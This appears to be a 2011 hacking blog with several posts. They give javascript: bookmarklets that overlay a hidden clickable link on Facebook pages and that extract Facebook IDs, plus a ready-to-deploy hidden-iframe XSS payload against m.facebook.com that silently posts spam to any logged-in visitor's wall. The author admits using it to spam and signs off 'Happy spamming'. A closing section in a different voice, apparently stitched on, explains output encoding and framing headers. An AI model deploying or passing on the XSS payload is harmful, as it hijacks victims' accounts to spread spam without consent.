

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He is currently pursuing his B.E. in Bangalore. He is a cyber security professional, hacker, designer and programmer, with a keen interest in hacking and network security, and he has developed several techniques for defending and defacing websites. He is of the opinion that people should learn this art to prevent cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter, as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various international conferences like NullCon GOA, c0c0n, ClubHack, Defcon, SecurityByte, ICFoCS, OWASP, etc. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows C, C++, C#, JAVA (SCJP), .NET, and PHP. Additionally he knows a few hardware languages like HDL, VHDL, Verilog, and embedded microcontroller programming. He has been featured on the Google hall of fame. Amol was named one of "India's top 10 hacker" by Google. "World's top 50 hacking blog" by Google.


Thursday, April 28, 2011

If you are an admin of a Facebook fan page or a Facebook application page, you can find the Suggest to Friends link at the bottom left of the page for an application page, and at the top right for a fan page. You can click the link to suggest your page to your friends. The problem is that when you are not an admin of a page, the link no longer appears on it. It was not like this before: Suggest to Friends was an Invite Friends link on the old version of a fan page/application page, and anyone could invite their friends at that time even when they were not the admin.
Now it is a little harder to suggest a Facebook page to your friends when you are not the admin. Many people ask how to show the Facebook Suggest to Friends dialog. We can use a JavaScript address bar hack to show the dialog. Using this simple code, the dialog will show whenever you click on any part of the page. The link is overlaid transparently in front of the page. Here is the script:

javascript:(function(){x=$('content').innerHTML;y=x.indexOf('_id');y=x.substring(y+4,y+27);x=y.substring(0,y.indexOf('"'));y=document.createElement('div');y.style.cssText='position:fixed;z-index:9;height:100%;';y.innerHTML='<a rel="dialog-post" href="http://amol-hackinglibrary.blogspot.com/" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id='+x+'" class="UIImageBlock_Content" style="color:transparent;height:10000px">ultral33t amol</a>';z=document.getElementsByTagName('div')[0];z.parentNode.insertBefore(y,z);alert('Now click anywhere on this page, suggest page dialog will show – ultral33t amol');})()

  1. Copy the code above
  2. Go to the page you want to suggest, for example : Facebook GIF Animated Application
  3. Paste the code on the address bar
  4. Then press enter
  5. An alert will show, just click OK or press enter
  6. Click anywhere on that page, the Facebook Suggest to Friends Dialog will show


What is a Facebook ID? It is a unique number identifying a Facebook profile, Facebook group or fan page. You can see it in the URL of other Facebook profiles; here is an example, the Facebook Bold Text profile URL:

In the URL above, 139701732734451 is the Facebook ID. Below are some JavaScript address bar tricks you can use to find a Facebook ID. You can get your own Facebook ID, your friends' Facebook IDs, or the IDs of Facebook groups and fan pages programmatically.

To find your own Facebook ID, simply put this code in the address bar and press enter:

javascript:alert('Your ultral33t amol Facebook ID : '+Env['user'])

For a friend's Facebook ID, or the ID of a Facebook group or fan page, go to the destination profile, then paste the code in the address bar. You can use one of these codes:

1. If the profile or Facebook page has a profile picture, not the default silhouette, use this:

javascript:x=$('profile_pic').src;y=x.substr(x.indexOf('_')+1);alert('ultral33t amol Facebook ID : '+y.substr(0,y.indexOf('_')))

2. This one uses the Facebook share link: it reads the link, then extracts the profile ID from it programmatically. You can use this if you can see the share link on the profile page. Here is the code:

javascript:x=$('content').getElementsByTagName('a');for(i=0;i<x.length;i++)if(x[i].href.indexOf('[]')>1){y=x[i].href;alert('ultral33t amol Facebook ID : '+y.substr(y.indexOf('[]')+3));break};void(0)

3. And this one uses xhpc_targetid, one of the form elements for sending a message to the destination wall. You can use this if you can post to the destination profile:

javascript:x=document.forms;for(i=0;i<x.length;i++){if(document.forms[i].xhpc_targetid){alert('Facebook ID : '+document.forms[i].xhpc_targetid.value);break}};void(0)

There are lots more tricks to see a Facebook ID, but we can't discuss them all here, because some people are copying the data and using it for unwanted things. Please don't copy. Some of the examples above will be enough for you to get the ID.
Happy tweaking :):)


Friday, April 15, 2011

Autopost Spamming using Facebook Mobile XSS

What has happened out there really pushes me to share this. I call this Autopost Spamming using Facebook Mobile XSS. I don't care anymore if this one will be filtered; the faster they fix it, the better. People don't seem to care how hard I tried to hide this code from the Facebook team. Frankly, I also use this to post spam with a link to this blog, but it only affects Indonesian IPs, with a custom interval, so people outside Indonesia won't be able to see it. Too bad it has now spread like a worm everywhere, wide open, without any source code protection.
Never mind, it's no use complaining about what has happened anyway. Let's talk about this in detail. This is about how to make an automatic status update post to people's Facebook profiles. This method uses an XSS vulnerability in prompt_feed.php on m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code:

<iframe id="amol-hackinglibrary" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://tinyurl.com/ultral33t-amol Wow.. amol cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>

Put the code above on your website and change the red code to your own message. Whenever logged-in Facebook users see your page, the message will be posted automatically to their wall.
That’s all. Happy spamming :(
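
The iframe above works only because the page reflects the user_message_prompt parameter into its HTML without encoding and allows itself to be loaded in a hidden frame. The sketch below is an added example, not code from this post or from Facebook: it shows that reflection pattern beside an output-encoded version and the response headers that block framing and inline script. The markup, function names and sample input are assumptions constructed for illustration.

```javascript
// Added example (constructed): a stand-in for a server page that reflects
// the user_message_prompt query parameter. Only that parameter name comes
// from the post; the markup and function names are assumptions.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the parameter is concatenated into the page as-is,
// so markup in the URL becomes markup in the response.
function renderPromptUnsafe(query) {
  const prompt = query.get('user_message_prompt') || '';
  return '<form method="post"><label>' + prompt + '</label>' +
         '<textarea name="message"></textarea></form>';
}

// Hardened pattern: encode on output, so the same input is shown as text.
function renderPromptSafe(query) {
  const prompt = escapeHtml(query.get('user_message_prompt') || '');
  return '<form method="post"><label>' + prompt + '</label>' +
         '<textarea name="message"></textarea></form>';
}

// Defence in depth: refuse to render inside a third-party frame and
// disallow inline script even if an encoding bug slips through.
function securityHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; frame-ancestors 'none'",
  };
}

// Constructed input: a harmless marker script, not the payload from the post.
const sampleQuery = new URLSearchParams({
  display: 'wap',
  user_message_prompt: "'<script>marker()</script>",
});

console.log('unsafe:', renderPromptUnsafe(sampleQuery));
console.log('safe:  ', renderPromptSafe(sampleQuery));
console.log(securityHeaders());
```

Output encoding is the fix for the reflection itself. The headers only limit what a missed encoding bug can do, since a page that cannot be framed can still be opened in a top-level window.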